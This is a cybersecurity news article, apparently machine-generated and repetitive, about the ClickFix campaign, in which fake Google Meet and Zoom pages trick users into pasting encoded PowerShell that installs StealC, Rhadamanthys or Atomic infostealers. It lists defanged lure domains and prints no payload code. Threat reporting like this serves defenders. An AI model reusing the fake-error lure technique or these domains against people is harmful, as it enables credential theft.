Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

New Malware Campaign Utilizes Fake Google Meet Pages to Deliver Infostealers



A recent malware campaign dubbed ClickFix has been discovered leveraging fake Google Meet web pages to deliver infostealers targeting Windows and macOS systems. The attack chain involves displaying fake error messages in web browsers to deceive users into copying and executing malicious PowerShell code, ultimately infecting their systems. Threat actors are using different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell code to address a supposed issue with displaying content in the web browser.

  • The threat landscape is evolving with a new malware campaign, ClickFix, using fake Google Meet web pages to deliver infostealers.
  • Threat actors are employing social engineering tactics to deceive users into copying and executing malicious PowerShell code.
  • The attack chain involves Windows systems deploying StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file that drops Atomic stealer.
  • Two traffers groups, Slavic Nation Empire and Scamquerteo, are attributed to the ClickFix campaign using the same template and infrastructure.
  • The emergence of open-source infostealers poses a significant shift in cyber threats, fueling rapid innovation and increasing risks for businesses and individuals.



    • The threat landscape continues to evolve and expand its reach, with a new malware campaign making headlines recently. The campaign, dubbed ClickFix, leverages fake Google Meet web pages to deliver infostealers targeting Windows and macOS systems. This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems.

    According to a report shared by French cybersecurity company Sekoia, the threat actors are employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell code to address a supposed issue with displaying content in the web browser. These fake Google Meet pages masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, as well as potentially Zoom.

    The attack chain culminates on Windows systems in the deployment of StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic. This emerging social engineering tactic is notable for its clever evasion of detection by security tools, as it involves the users manually running the malicious PowerShell command directly on the terminal, rather than being automatically invoked by a payload downloaded and executed by them.

    Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively. Both of these teams use the same ClickFix template that impersonates Google Meet. This discovery suggests that they share materials, also known as 'landing project,' as well as infrastructure.

    This, in turn, has raised the possibility that both the threat groups are making use of the same, as-yet-unknown cybercrime service, with a third-party likely managing their infrastructure. The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.

    The rise of open-source infostealers represents a significant shift in the world of cyber threats. By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals.

    In recent months, variations of the ClickFix campaign have been reported widely, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware. These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet.

    The clusters impersonating Google Meet include:
    - meet.googie.com-join[.]us
    - meet.google.com-join[.]us
    - meet.google.web-join[.]com
    - meet.google.webjoining[.]com
    - meet.google.cdm-join[.]us
    - us01web-zoom[.]us
    - us002webzoom[.]us
    - web05-zoom[.]us
    - webroom-zoom[.]us

    On Windows, the attack chain culminates in the deployment of StealC and Rhadamanthys stealers. On Apple macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic.

    This emerging social engineering tactic is notable for its ability to evade detection by security tools, as it involves the users manually running the malicious PowerShell command directly on the terminal, rather than being automatically invoked by a payload downloaded and executed by them.

    The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.

    "The rise of open-source infostealers represents a significant shift in the world of cyber threats," noted cybersecurity company Hudson Rock. "By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."



    Related Information:

  • https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html

  • https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/

  • https://www.forbes.com/sites/daveywinder/2024/10/18/hackers-avoid-google-chrome-security-features-in-new-attack-researchers-warn/

  • https://mssplab.github.io/threat-hunting/2023/11/09/malware-analysis-stealc-1.html

  • https://any.run/malware-trends/stealc

  • https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version

  • https://www.bleepingcomputer.com/news/security/atomic-stealer-malware-strikes-macos-via-fake-browser-updates/

  • https://github.com/hackirby/skuld

  • https://www.tomsguide.com/news/this-new-malware-is-taking-over-discord-accounts-and-stealing-browser-data-what-you-need-to-know

  • https://www.cyfirma.com/research/the-will-of-d-a-deep-dive-into-divulge-stealer-dedsec-stealer-and-duck-stealer/

  • https://malwaretips.com/blogs/yunit-trojan-stealer/

  • https://www.pcrisk.com/removal-guides/31232-yunit-stealer

  • https://thehackernews.com/2024/10/sidewinder-apt-strikes-middle-east-and.html

  • https://www.netmaker.io/resources/apt-groups


    • Published: Fri Oct 18 06:48:14 2024 by llama3.2 3B Q4_K_M


         


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us